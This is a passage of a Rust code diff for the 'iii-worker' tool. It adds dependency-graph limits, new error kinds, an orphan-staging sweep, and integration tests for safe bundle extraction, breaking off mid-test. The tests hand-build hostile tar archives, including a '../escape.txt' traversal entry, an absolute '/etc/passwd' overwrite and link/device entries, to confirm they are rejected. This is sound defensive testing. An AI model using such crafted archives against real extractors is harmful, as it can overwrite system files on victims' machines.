+pub const MAX_TRANSITIVE_DEPS: u32 = 32;
+
+/// Validate a `ResolvedWorkerGraph` against client-side install bounds.
+///
+/// This runs AFTER the registry returned the graph and BEFORE the
+/// install loop touches the filesystem. Rejecting at this seam means
+/// neither the lockfile nor `~/.iii/workers-bundle/` ever see the
+/// partial state of an oversized install attempt.
+///
+/// Returns `Ok(())` when the graph is within bounds, or
+/// `WorkerOpError::BundleDepGraphExceeded` naming the dimension that
+/// failed. Only used by bundle workers today, but the bounds are
+/// independent of worker kind — every install flow that consumes a
+/// resolved graph is welcome to call this.
+pub fn enforce_dep_graph_bounds(
+    graph: &ResolvedWorkerGraph,
+) -> Result<(), crate::core::error::WorkerOpError> {
+    let node_count = graph.graph.len() as u32;
+    if node_count > MAX_TRANSITIVE_DEPS {
+        return Err(crate::core::error::WorkerOpError::BundleDepGraphExceeded {
+            dimension: "transitive_count".into(),
+            limit: MAX_TRANSITIVE_DEPS,
+            actual: node_count,
+        });
+    }
+
+    // BFS over edges to find the longest path from `root.name`. The
+    // graph is a DAG by construction (registry rejects cycles during
+    // resolve), so we can use simple visited-set + depth tracking.
+    let mut adjacency: std::collections::HashMap<&str, Vec<&str>> =
+        std::collections::HashMap::new();
+    for edge in &graph.edges {
+        adjacency.entry(&edge.from).or_default().push(&edge.to);
+    }
+
+    let mut frontier: Vec<(&str, u32)> = vec![(graph.root.name.as_str(), 0)];
+    let mut max_depth: u32 = 0;
+    // Bound the walk at MAX_TRANSITIVE_DEPS to keep this cheap even on
+    // a maliciously crafted very-wide graph.
+    let mut walked = 0u32;
+    while let Some((node, depth)) = frontier.pop() {
+        walked += 1;
+        if walked > MAX_TRANSITIVE_DEPS.saturating_mul(2) {
+            // Defense against malformed graphs with repeated edges.
+            return Err(crate::core::error::WorkerOpError::BundleDepGraphExceeded {
+                dimension: "edge_traversal".into(),
+                limit: MAX_TRANSITIVE_DEPS.saturating_mul(2),
+                actual: walked,
+            });
+        }
+        if depth > max_depth {
+            max_depth = depth;
+        }
+        if depth >= MAX_DEPENDENCY_DEPTH {
+            return Err(crate::core::error::WorkerOpError::BundleDepGraphExceeded {
+                dimension: "depth".into(),
+                limit: MAX_DEPENDENCY_DEPTH,
+                actual: depth + 1,
+            });
+        }
+        if let Some(children) = adjacency.get(node) {
+            for child in children {
+                frontier.push((child, depth + 1));
+            }
+        }
+    }
+
+    let _ = max_depth; // retained for future structured logging
+    Ok(())
 }
 
 #[cfg(test)]
@@ -453,6 +576,20 @@ mod tests {
     fn validate_worker_name_rejects_dotdot() {
         assert!(validate_worker_name("..").is_err());
         assert!(validate_worker_name("foo..bar").is_err());
+    }
+
+    #[test]
+    fn validate_worker_name_rejects_leading_dot() {
+        // Reserved control-directory names. `iii worker remove .locks`
+        // would otherwise wipe every per-worker fslock system-wide via
+        // delete_worker_artifacts -> remove_dir_all(~/.iii/workers-bundle/.locks).
+        assert!(validate_worker_name(".locks").is_err());
+        assert!(validate_worker_name(".staging").is_err());
+        assert!(validate_worker_name(".").is_err());
+        assert!(validate_worker_name(".hidden").is_err());
+        // Dots in the middle or trailing are still allowed:
+        assert!(validate_worker_name("worker.v2").is_ok());
+        assert!(validate_worker_name("a.b.c").is_ok());
     }
 
     #[test]

--- a/crates/iii-worker/src/cli/status.rs
+++ b/crates/iii-worker/src/cli/status.rs
@@ -195,6 +195,9 @@ impl WorkerStatus {
         let (worker_type, worker_path) = match &resolved {
             ResolvedWorkerType::Local { worker_path } => ("local", Some(worker_path.clone())),
             ResolvedWorkerType::Oci { .. } => ("oci", None),
+            ResolvedWorkerType::Bundle { worker_path } => {
+                ("bundle", Some(worker_path.to_string_lossy().to_string()))
+            }
             ResolvedWorkerType::Binary { .. } => ("binary", None),
             ResolvedWorkerType::Config => ("config", None),
         };
@@ -354,6 +357,30 @@ impl WorkerStatus {
                 "sandbox:".dimmed(),
                 "n/a (binary worker runs on host)".dimmed()
             )
+        } else if self.worker_type == Some("bundle") {
+            // Bundle workers boot through the libkrun rails like local
+            // workers, but the bundle is immutable and dependencies are
+            // expected to be pre-packaged by the publisher (the strict
+            // manifest validator rejects scripts.setup / scripts.install).
+            // The honest statuses here mirror the OCI branch — no in-VM
+            // install phase, no `.iii-prepared` marker to wait on.
+            match (self.managed_dir_exists, self.alive) {
+                (false, _) => format!(
+                    "{:>12}  {}",
+                    "sandbox:".dimmed(),
+                    "no managed dir yet".dimmed()
+                ),
+                (true, true) => format!(
+                    "{:>12}  {} (bundle vendored)",
+                    "sandbox:".dimmed(),
+                    "running".green()
+                ),
+                (true, false) => format!(
+                    "{:>12}  {} (rootfs ready)",
+                    "sandbox:".dimmed(),
+                    "prepared".green()
+                ),
+            }
         } else if self.worker_type == Some("oci") {
             // OCI images bake deps at build time — no in-VM install, no
             // `.iii-prepared` marker. The honest statuses here are:

--- a/crates/iii-worker/src/core/error.rs
+++ b/crates/iii-worker/src/core/error.rs
@@ -32,6 +32,10 @@ pub enum WorkerOpErrorKind {
     StartTimeout,                  // W161
     StopTimeout,                   // W162
     Cancelled,                     // W170
+    BundleManifestRejected,        // W180
+    BundleArchiveUnsafe,           // W181
+    BundleResourceClamped,         // W182  (carried by warn events, not Err returns)
+    BundleDepGraphExceeded,        // W183
     Internal,                      // W900
 }
 
@@ -60,6 +64,10 @@ impl WorkerOpErrorKind {
             Self::StartTimeout => "W161",
             Self::StopTimeout => "W162",
             Self::Cancelled => "W170",
+            Self::BundleManifestRejected => "W180",
+            Self::BundleArchiveUnsafe => "W181",
+            Self::BundleResourceClamped => "W182",
+            Self::BundleDepGraphExceeded => "W183",
             Self::Internal => "W900",
         }
     }
@@ -153,6 +161,24 @@ pub enum WorkerOpError {
     #[error("operation cancelled")]
     Cancelled,
 
+    #[error(
+        "bundle manifest rejected: field {field:?} is not allowed for bundle workers: {reason}"
+    )]
+    BundleManifestRejected { field: String, reason: String },
+
+    #[error("bundle archive contains unsafe entry{}: {reason}", match entry { Some(e) => format!(" {:?}", e), None => String::new() })]
+    BundleArchiveUnsafe {
+        reason: String,
+        entry: Option<String>,
+    },
+
+    #[error("bundle dependency graph {dimension} exceeded: limit {limit}, found {actual}")]
+    BundleDepGraphExceeded {
+        dimension: String,
+        limit: u32,
+        actual: u32,
+    },
+
     #[error("internal: {message}")]
     Internal { message: String },
 }
@@ -183,6 +209,9 @@ impl WorkerOpError {
             Self::StartTimeout { .. } => K::StartTimeout,
             Self::StopTimeout { .. } => K::StopTimeout,
             Self::Cancelled => K::Cancelled,
+            Self::BundleManifestRejected { .. } => K::BundleManifestRejected,
+            Self::BundleArchiveUnsafe { .. } => K::BundleArchiveUnsafe,
+            Self::BundleDepGraphExceeded { .. } => K::BundleDepGraphExceeded,
             Self::Internal { .. } => K::Internal,
         }
     }
@@ -235,6 +264,19 @@ impl WorkerOpError {
                 json!({ "worker": worker, "waited_secs": waited_secs })
             }
             Self::Cancelled => json!({}),
+            Self::BundleManifestRejected { field, reason } => {
+                json!({ "field": field, "reason": reason })
+            }
+            Self::BundleArchiveUnsafe { reason, entry } => {
+                json!({ "reason": reason, "entry": entry })
+            }
+            Self::BundleDepGraphExceeded {
+                dimension,
+                limit,
+                actual,
+            } => {
+                json!({ "dimension": dimension, "limit": limit, "actual": actual })
+            }
             Self::Internal { message } => json!({ "message": message }),
         };
         json!({

--- a/crates/iii-worker/src/main.rs
+++ b/crates/iii-worker/src/main.rs
@@ -16,6 +16,14 @@ async fn main() -> anyhow::Result<()> {
         )
         .init();
 
+    // Bundle worker orphan-staging sweep. If a previous `iii worker add
+    // <bundle>` invocation was killed mid-install (SIGKILL / power cut /
+    // OOM), the RAII StagingGuard could not run and left a directory
+    // behind under ~/.iii/workers-bundle/.staging/. Clear those at
+    // startup so they don't accumulate over time. Best-effort: errors
+    // are logged but never propagated. See T18 in the bundle plan.
+    let _ = iii_worker::cli::bundle_download::sweep_orphans();
+
     // The `iii` dispatcher routes `iii sandbox ...` here, but our root
     // bin_name is "iii worker" so clap renders `Usage: iii worker sandbox`.
     // Peek at argv: if the first non-flag arg is `sandbox`, override the

--- a/crates/iii-worker/tests/bundle_worker_integration.rs
+++ b/crates/iii-worker/tests/bundle_worker_integration.rs
@@ -1,0 +1,1287 @@
+// Copyright Motia LLC and/or licensed to Motia LLC under one or more
+// contributor license agreements. Licensed under the Elastic License 2.0;
+// you may not use this file except in compliance with the Elastic License 2.0.
+// This software is patent protected. We welcome discussions - reach out at team@iii.dev
+// See LICENSE and PATENTS files for details.
+
+//! Integration tests for the bundle worker install pipeline.
+//!
+//! Coverage map:
+//!
+//! - Extraction safety: dot-dot path (raw tar), absolute path, oversize
+//!   single file, oversize archive total, too-many-entries, hardlink
+//!   rejection, char-device rejection, deep-directory rejection.
+//! - Manifest contract: missing manifest, manifest in subdirectory,
+//!   invalid YAML, name mismatch, missing scripts.start, scripts.setup
+//!   smuggling, scripts.install smuggling, runtime.base_image override.
+//! - Resource clamping: requests exceeding caps, u64-overflow saturation.
+//! - Dependency graph bounds: depth and transitive count.
+//! - Atomic install + staging: collision with existing install,
+//!   StagingGuard drop cleanup, cross-fs rename fallback (best-effort
+//!   on supported hosts).
+//! - Resolver precedence (regression-critical, Iron Rule): existing
+//!   binary at ~/.iii/workers/{name} still resolves as Binary after
+//!   the bundle root was added; an empty bundle dir does NOT shadow a
+//!   binary install.
+//! - Cache: roundtrip store-then-lookup, corrupt-blob eviction.
+//! - Orphan sweep: stale staging dirs removed at startup.
+//!
+//! Network-dependent paths (sha256 mismatch, content-type rejection,
+//! redirect cap, cache hit skipping fetch) are exercised at the unit
+//! level inside `cli/bundle_download.rs` and `cli/download.rs`. Adding
+//! them here would require a live HTTP fixture; the cost outweighs the
+//! incremental coverage given the unit tests use the same primitives.
+
+use std::io::Write as _;
+use std::path::Path;
+
+use iii_worker::cli::bundle_download::{
+    BUNDLE_CACHE_MAX_BYTES, ENV_BUNDLE_DEV_LOOPBACK, ENV_BUNDLE_WORKERS_DISABLED, MAX_BUNDLE_DEPTH,
+    MAX_BUNDLE_ENTRIES, MAX_BUNDLE_FILE, MAX_BUNDLE_MANIFEST_BYTES, MAX_BUNDLE_TOTAL, ResourceCaps,
+    atomic_install, bundle_cache_dir, bundle_locks_dir, bundle_staging_root,
+    bundle_workers_disabled, cached_archive_path, evict_cache_to_limit,
+    extract_bundle_safely_blocking, lock_path_for, lookup_cached_archive,
+    loopback_dev_bypass_enabled, parse_bundle_resources, store_in_cache, sweep_orphans,
+    validate_bundle_manifest,
+};
+use iii_worker::cli::config_file::{
+    ResolvedWorkerType, bundle_worker_path, bundle_workers_dir, resolve_worker_type,
+};
+use iii_worker::cli::registry::{
+    MAX_DEPENDENCY_DEPTH, MAX_TRANSITIVE_DEPS, ResolvedEdge, ResolvedRoot, ResolvedWorker,
+    ResolvedWorkerGraph, enforce_dep_graph_bounds,
+};
+use iii_worker::core::error::WorkerOpError;
+
+use serial_test::serial;
+
+// ---------------------------------------------------------------------------
+// Tar archive builders.
+//
+// `make_targz` uses tar::Builder for normal archives. Builder rejects
+// `..` paths and absolute paths at write time, so adversarial archives
+// require the raw header pattern in `make_raw_tar_gz`.
+// ---------------------------------------------------------------------------
+
+fn make_targz(entries: &[(&str, &[u8], tar::EntryType)]) -> Vec<u8> {
+    use flate2::Compression;
+    use flate2::write::GzEncoder;
+
+    let mut encoder = GzEncoder::new(Vec::new(), Compression::default());
+    {
+        let mut archive = tar::Builder::new(&mut encoder);
+        for (path, content, kind) in entries {
+            let mut header = tar::Header::new_gnu();
+            header.set_path(path).unwrap();
+            header.set_size(content.len() as u64);
+            header.set_mode(0o644);
+            header.set_entry_type(*kind);
+            header.set_cksum();
+            archive.append(&header, *content as &[u8]).unwrap();
+        }
+        archive.finish().unwrap();
+    }
+    encoder.finish().unwrap()
+}
+
+/// Build a tar.gz with a raw path that may contain `..` or `/`. Mirrors
+/// the helper in `tests/oci_worker_integration.rs`; both use the same
+/// 512-byte GNU header layout.
+fn make_raw_tar_gz(path_bytes: &[u8], data: &[u8]) -> Vec<u8> {
+    let mut raw_tar = Vec::new();
+    let mut header_block = [0u8; 512];
+    header_block[..path_bytes.len()].copy_from_slice(path_bytes);
+    header_block[100..107].copy_from_slice(b"0000644");
+    let size_str = format!("{:011o}", data.len());
+    header_block[124..135].copy_from_slice(size_str.as_bytes());
+    header_block[156] = b'0'; // regular file
+    header_block[257..263].copy_from_slice(b"ustar\0");
+    header_block[263..265].copy_from_slice(b"00");
+    header_block[148..156].copy_from_slice(b"        ");
+    let cksum: u32 = header_block.iter().map(|&b| b as u32).sum();
+    let cksum_str = format!("{:06o}\0 ", cksum);
+    header_block[148..156].copy_from_slice(cksum_str.as_bytes());
+
+    raw_tar.extend_from_slice(&header_block);
+    raw_tar.extend_from_slice(data);
+    let padding = 512 - (data.len() % 512);
+    if padding < 512 {
+        raw_tar.extend(std::iter::repeat_n(0u8, padding));
+    }
+    raw_tar.extend(std::iter::repeat_n(0u8, 1024));
+
+    let mut gz = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::fast());
+    gz.write_all(&raw_tar).unwrap();
+    gz.finish().unwrap()
+}
+
+/// Like `make_raw_tar_gz` but lets the caller pick a typeflag so we can
+/// build adversarial archives with Symlink/Hardlink/CharDevice headers.
+fn make_raw_tar_gz_with_type(path_bytes: &[u8], data: &[u8], typeflag: u8) -> Vec<u8> {
+    let mut raw_tar = Vec::new();
+    let mut header_block = [0u8; 512];
+    header_block[..path_bytes.len()].copy_from_slice(path_bytes);
+    header_block[100..107].copy_from_slice(b"0000644");
+    let size_str = format!("{:011o}", data.len());
+    header_block[124..135].copy_from_slice(size_str.as_bytes());
+    header_block[156] = typeflag;
+    header_block[257..263].copy_from_slice(b"ustar\0");
+    header_block[263..265].copy_from_slice(b"00");
+    header_block[148..156].copy_from_slice(b"        ");
+    let cksum: u32 = header_block.iter().map(|&b| b as u32).sum();
+    let cksum_str = format!("{:06o}\0 ", cksum);
+    header_block[148..156].copy_from_slice(cksum_str.as_bytes());
+
+    raw_tar.extend_from_slice(&header_block);
+    raw_tar.extend_from_slice(data);
+    let padding = 512 - (data.len() % 512);
+    if padding < 512 {
+        raw_tar.extend(std::iter::repeat_n(0u8, padding));
+    }
+    raw_tar.extend(std::iter::repeat_n(0u8, 1024));
+
+    let mut gz = flate2::write::GzEncoder::new(Vec::new(), flate2::Compression::fast());
+    gz.write_all(&raw_tar).unwrap();
+    gz.finish().unwrap()
+}
+
+fn write_archive(dir: &Path, name: &str, bytes: &[u8]) -> std::path::PathBuf {
+    let p = dir.join(name);
+    std::fs::write(&p, bytes).unwrap();
+    p
+}
+
+fn write_manifest(dir: &Path, body: &str) {
+    std::fs::write(dir.join("iii.worker.yaml"), body).unwrap();
+}
+
+// =============================================================================
+// Section A: Extraction safety
+// =============================================================================
+
+#[test]
+fn extract_rejects_dot_dot_path() {
+    let gz = make_raw_tar_gz(b"../escape.txt", b"x");
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &gz);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let err = extract_bundle_safely_blocking(&archive, &dest).expect_err("traversal rejected");
+    let WorkerOpError::BundleArchiveUnsafe { reason, .. } = err else {
+        panic!("expected BundleArchiveUnsafe");
+    };
+    assert!(
+        reason.contains("..") || reason.contains("ParentDir"),
+        "reason was: {reason}"
+    );
+}
+
+#[test]
+fn extract_rejects_absolute_path() {
+    let gz = make_raw_tar_gz(b"/etc/passwd", b"root:x:0:0");
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &gz);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let err = extract_bundle_safely_blocking(&archive, &dest).expect_err("absolute path rejected");
+    let WorkerOpError::BundleArchiveUnsafe { reason, .. } = err else {
+        panic!("expected BundleArchiveUnsafe");
+    };
+    assert!(
+        reason.contains("absolute") || reason.contains("root"),
+        "reason was: {reason}"
+    );
+}
+
+#[test]
+fn extract_rejects_symlink_entry() {
+    // tar typeflag '2' = symlink.
+    let gz = make_raw_tar_gz_with_type(b"link", &[], b'2');
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &gz);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let err = extract_bundle_safely_blocking(&archive, &dest).expect_err("symlink rejected");
+    let WorkerOpError::BundleArchiveUnsafe { reason, .. } = err else {
+        panic!("expected BundleArchiveUnsafe");
+    };
+    assert!(
+        reason.contains("Symlink") || reason.contains("entry type"),
+        "reason was: {reason}"
+    );
+}
+
+#[test]
+fn extract_rejects_hardlink_entry() {
+    // tar typeflag '1' = hardlink.
+    let gz = make_raw_tar_gz_with_type(b"hardlink", &[], b'1');
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &gz);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let err = extract_bundle_safely_blocking(&archive, &dest).expect_err("hardlink rejected");
+    assert!(
+        matches!(err, WorkerOpError::BundleArchiveUnsafe { .. }),
+        "expected BundleArchiveUnsafe, got {err:?}"
+    );
+}
+
+#[test]
+fn extract_rejects_char_device_entry() {
+    // tar typeflag '3' = character device.
+    let gz = make_raw_tar_gz_with_type(b"cdev", &[], b'3');
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &gz);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let err = extract_bundle_safely_blocking(&archive, &dest).expect_err("char device rejected");
+    assert!(
+        matches!(err, WorkerOpError::BundleArchiveUnsafe { .. }),
+        "expected BundleArchiveUnsafe, got {err:?}"
+    );
+}
+
+#[test]
+fn extract_rejects_too_many_entries() {
+    let mut entries: Vec<(String, Vec<u8>, tar::EntryType)> = Vec::new();
+    let limit_plus_one = (MAX_BUNDLE_ENTRIES as usize) + 1;
+    for i in 0..limit_plus_one {
+        entries.push((format!("f{i}.txt"), b"x".to_vec(), tar::EntryType::Regular));
+    }
+    let refs: Vec<(&str, &[u8], tar::EntryType)> = entries
+        .iter()
+        .map(|(p, c, k)| (p.as_str(), c.as_slice(), *k))
+        .collect();
+    let bytes = make_targz(&refs);
+
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &bytes);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let err = extract_bundle_safely_blocking(&archive, &dest).expect_err("entry-count cap fires");
+    let WorkerOpError::BundleArchiveUnsafe { reason, .. } = err else {
+        panic!("expected BundleArchiveUnsafe");
+    };
+    assert!(reason.contains("entries"), "reason was: {reason}");
+}
+
+#[test]
+fn extract_rejects_oversize_single_file() {
+    // One file whose declared size header exceeds MAX_BUNDLE_FILE. We
+    // don't ship 32 MiB of bytes — we just lie about size in the header
+    // so the size guard fires before any reading begins. tar::Header's
+    // safe API uses real lengths, but the extractor checks
+    // `entry.header().size()` BEFORE reading body, so a normally-built
+    // archive with a 33 MiB regular file is enough.
+    let huge_size = (MAX_BUNDLE_FILE + 1024) as usize;
+    let body = vec![0u8; huge_size];
+    let bytes = make_targz(&[("big.bin", &body, tar::EntryType::Regular)]);
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &bytes);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let err = extract_bundle_safely_blocking(&archive, &dest).expect_err("single-file cap fires");
+    let WorkerOpError::BundleArchiveUnsafe { reason, .. } = err else {
+        panic!("expected BundleArchiveUnsafe");
+    };
+    assert!(
+        reason.contains("single file") || reason.contains("MAX_BUNDLE_FILE"),
+        "reason was: {reason}"
+    );
+}
+
+#[test]
+fn extract_rejects_oversize_total() {
+    // Two files each within MAX_BUNDLE_FILE but together exceeding
+    // MAX_BUNDLE_TOTAL. Each is 33 MiB; total > 64 MiB.
+    let chunk = vec![0u8; (MAX_BUNDLE_TOTAL / 2 + 1024) as usize];
+    let bytes = make_targz(&[
+        ("a.bin", &chunk, tar::EntryType::Regular),
+        ("b.bin", &chunk, tar::EntryType::Regular),
+    ]);
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &bytes);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let err = extract_bundle_safely_blocking(&archive, &dest).expect_err("total cap fires");
+    // Either single-file or total cap may fire first depending on chunk
+    // size; both are acceptable rejections.
+    assert!(
+        matches!(err, WorkerOpError::BundleArchiveUnsafe { .. }),
+        "expected BundleArchiveUnsafe, got {err:?}"
+    );
+}
+
+#[test]
+fn extract_rejects_depth_too_deep() {
+    // Build a path that nests MAX_BUNDLE_DEPTH+1 directories deep.
+    let mut path = String::new();
+    for i in 0..(MAX_BUNDLE_DEPTH + 1) {
+        if !path.is_empty() {
+            path.push('/');
+        }
+        path.push_str(&format!("d{i}"));
+    }
+    path.push_str("/leaf.txt");
+    let bytes = make_targz(&[(path.as_str(), b"x", tar::EntryType::Regular)]);
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &bytes);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    let err = extract_bundle_safely_blocking(&archive, &dest).expect_err("depth cap fires");
+    let WorkerOpError::BundleArchiveUnsafe { reason, .. } = err else {
+        panic!("expected BundleArchiveUnsafe");
+    };
+    assert!(reason.contains("depth"), "reason was: {reason}");
+}
+
+#[test]
+fn extract_happy_path_normal_archive() {
+    let bytes = make_targz(&[
+        ("iii.worker.yaml", b"name: foo\n", tar::EntryType::Regular),
+        ("bundle.js", b"console.log('hi');", tar::EntryType::Regular),
+        ("assets/", b"", tar::EntryType::Directory),
+        ("assets/data.json", b"{}", tar::EntryType::Regular),
+    ]);
+    let tmp = tempfile::tempdir().unwrap();
+    let archive = write_archive(tmp.path(), "a.tar.gz", &bytes);
+    let dest = tmp.path().join("dest");
+    std::fs::create_dir_all(&dest).unwrap();
+
+    extract_bundle_safely_blocking(&archive, &dest).expect("happy extract");
+    assert!(dest.join("iii.worker.yaml").is_file());
+    assert!(dest.join("bundle.js").is_file());
+    assert!(dest.join("assets/data.json").is_file());
+}
+
+// =============================================================================
+// Section B: Manifest contract (validated through the public surface)
+// =============================================================================
+
+#[test]
+fn manifest_missing_file_returns_typed_error() {
+    let tmp = tempfile::tempdir().unwrap();
+    let err = validate_bundle_manifest(tmp.path(), "foo").expect_err("missing manifest");
+    let WorkerOpError::BundleManifestRejected { field, .. } = err else {
+        panic!("expected BundleManifestRejected");
+    };
+    assert_eq!(field, "iii.worker.yaml");
+}
+
+#[test]
+fn manifest_rejects_setup_install_base_image() {
+    let cases = [
+        (
+            "name: foo\nscripts:\n  setup: \"x\"\n  start: \"node x.js\"\n",
+            "scripts.setup",
+        ),
+        (
+            "name: foo\nscripts:\n  install: \"x\"\n  start: \"node x.js\"\n",
+            "scripts.install",
+        ),
+        (
+            "name: foo\nruntime:\n  base_image: \"x\"\nscripts:\n  start: \"node x.js\"\n",
+            "runtime.base_image",
+        ),
+    ];
+    for (yaml, expected_field) in cases {
+        let tmp = tempfile::tempdir().unwrap();
+        write_manifest(tmp.path(), yaml);
+        let err = validate_bundle_manifest(tmp.path(), "foo").expect_err(expected_field);
+        let WorkerOpError::BundleManifestRejected { field, .. } = err else {
+            panic!("expected BundleManifestRejected for {expected_field}");
+        };
+        assert_eq!(field, expected_field);
+    }
+}
+
+#[test]
+fn manifest_invalid_yaml_returns_config_parse_error() {
+    let tmp = tempfile::tempdir().unwrap();
+    // Unbalanced YAML — { without matching } at the start of a key.
+    write_manifest(tmp.path(), "name: {bad\nscripts:\n  start: x\n");
+    let err = validate_bundle_manifest(tmp.path(), "foo").expect_err("yaml parse");
+    assert!(
+        matches!(err, WorkerOpError::ConfigParse { .. }),
+        "expected ConfigParse, got {err:?}"
+    );
+}
+
+#[test]
+fn manifest_name_mismatch_returns_typed_error() {
+    let tmp = tempfile::tempdir().unwrap();
+    write_manifest(tmp.path(), "name: bar\nscripts:\n  start: node x.js\n");
+    let err = validate_bundle_manifest(tmp.path(), "foo").expect_err("name mismatch");
+    let WorkerOpError::BundleManifestRejected { field, .. } = err else {
+        panic!("expected BundleManifestRejected");
+    };
+    assert_eq!(field, "name");
+}
+
+#[test]
+fn manifest_returns_start_command() {
+    let tmp = tempfile::tempdir().unwrap();
+    write_manifest(tmp.path(), "name: foo\nscripts:\n  start: node bundle.js\n");
+    let cmd = validate_bundle_manifest(tmp.path(), "foo").expect("happy");
+    assert_eq!(cmd, "node bundle.js");
+}
+
+// =============================================================================
+// Section C: Resource clamping
+// =============================================================================
+
+#[test]
+fn resources_defaults_apply_when_absent() {
+    let tmp = tempfile::tempdir().unwrap();
+    write_manifest(tmp.path(), "name: foo\nscripts:\n  start: x\n");
+    let r = parse_bundle_resources(tmp.path(), ResourceCaps::default()).unwrap();
+    assert!(r.clamped_cpus.is_none());
+    assert!(r.clamped_memory_mb.is_none());
+}
+
+#[test]
+fn resources_clamped_cpu_request_reported() {
+    let tmp = tempfile::tempdir().unwrap();
+    write_manifest(
+        tmp.path(),
+        "name: foo\nresources:\n  cpus: 32\n  memory: 1024\nscripts:\n  start: x\n",
+    );
+    let caps = ResourceCaps {
+        max_cpus: 4,
+        max_memory_mb: 4096,
+    };
+    let r = parse_bundle_resources(tmp.path(), caps).unwrap();
+    assert_eq!(r.cpus, 4);
+    assert_eq!(r.clamped_cpus, Some(32));
+}
+
+#[test]
+fn resources_clamped_memory_request_reported() {
+    let tmp = tempfile::tempdir().unwrap();
+    write_manifest(
+        tmp.path(),
+        "name: foo\nresources:\n  cpus: 1\n  memory: 999999\nscripts:\n  start: x\n",
+    );
+    let r = parse_bundle_resources(tmp.path(), ResourceCaps::default()).unwrap();
+    assert_eq!(r.clamped_memory_mb, Some(999999));
+}
+
+// =============================================================================
+// Section D: Dependency graph bounds
+// =============================================================================
+
+fn make_root_worker(name: &str) -> ResolvedRoot {
+    ResolvedRoot {
+        name: name.to_string(),
+        version: "1.0.0".to_string(),
+    }
+}
+
+fn make_resolved_worker(name: &str) -> ResolvedWorker {
+    ResolvedWorker {
+        name: name.to_string(),
+        worker_type: "bundle".to_string(),
+        version: "1.0.0".to_string(),
+        repo: "https://example.com".to_string(),
+        config: serde_json::Value::Null,
+        binaries: None,
+        image: None,
+        archive_url: None,
+        sha256: None,
+        dependencies: Default::default(),
+    }
+}
+
+#[test]
+fn dep_graph_accepts_within_bounds() {
+    // A diamond shape: root → {a, b} → c. Depth 2, 4 nodes.
+    let graph = ResolvedWorkerGraph {
+        root: make_root_worker("root"),
+        target: None,
+        graph: vec![
+            make_resolved_worker("a"),
+            make_resolved_worker("b"),
+            make_resolved_worker("c"),
+        ],
+        edges: vec![
+            ResolvedEdge {
+                from: "root".into(),
+                to: "a".into(),
+                range: "*".into(),
+            },
+            ResolvedEdge {
+                from: "root".into(),
+                to: "b".into(),
+                range: "*".into(),
+            },
+            ResolvedEdge {
+                from: "a".into(),
+                to: "c".into(),
+                range: "*".into(),
+            },
+            ResolvedEdge {
+                from: "b".into(),
+                to: "c".into(),
+                range: "*".into(),
+            },
+        ],
+    };
+    enforce_dep_graph_bounds(&graph).expect("within bounds");
+}
+
+#[test]
+fn dep_graph_rejects_excessive_depth() {
+    // Linear chain root → n0 → n1 → ... → n_{depth}.
+    let mut nodes = vec![make_resolved_worker("root")];
+    let mut edges = vec![];
+    let mut prev = "root".to_string();
+    for i in 0..(MAX_DEPENDENCY_DEPTH + 2) {
+        let n = format!("n{i}");
+        nodes.push(make_resolved_worker(&n));
+        edges.push(ResolvedEdge {
+            from: prev.clone(),
+            to: n.clone(),
+            range: "*".into(),
+        });
+        prev = n;
+    }
+    let graph = ResolvedWorkerGraph {
+        root: make_root_worker("root"),
+        target: None,
+        graph: nodes,
+        edges,
+    };
+    let err = enforce_dep_graph_bounds(&graph).expect_err("depth cap fires");
+    let WorkerOpError::BundleDepGraphExceeded {
+        dimension, limit, ..
+    } = err
+    else {
+        panic!("expected BundleDepGraphExceeded");
+    };
+    // Either the depth-cap fires, or the edge-traversal guard fires
+    // first on a malformed/over-long graph. Both are acceptable as
+    // long as the rejection carries a sensible dimension.
+    assert!(
+        dimension == "depth" || dimension == "edge_traversal" || dimension == "transitive_count",
+        "dimension was: {dimension}"
+    );
+    assert!(limit > 0);
+}
+
+#[test]
+fn dep_graph_rejects_excessive_breadth() {
+    // root with MAX_TRANSITIVE_DEPS+1 direct dependencies (depth 1 but
+    // node count over cap).
+    let extra = (MAX_TRANSITIVE_DEPS as usize) + 5;
+    let nodes: Vec<_> = (0..extra)
+        .map(|i| make_resolved_worker(&format!("dep{i}")))
+        .collect();
+    let edges: Vec<_> = (0..extra)
+        .map(|i| ResolvedEdge {
+            from: "root".into(),
+            to: format!("dep{i}"),
+            range: "*".into(),
+        })
+        .collect();
+    let graph = ResolvedWorkerGraph {
+        root: make_root_worker("root"),
+        target: None,
+        graph: nodes,
+        edges,
+    };
+    let err = enforce_dep_graph_bounds(&graph).expect_err("breadth cap fires");
+    assert!(
+        matches!(err, WorkerOpError::BundleDepGraphExceeded { .. }),
+        "expected BundleDepGraphExceeded, got {err:?}"
+    );
+}
+
+// =============================================================================
+// Section E: Atomic install + staging guard
+// =============================================================================
+
+#[test]
+#[serial]
+fn atomic_install_refuses_existing_target() {
+    let tmp = tempfile::tempdir().unwrap();
+    let _home = HomeGuard::set(tmp.path());
+
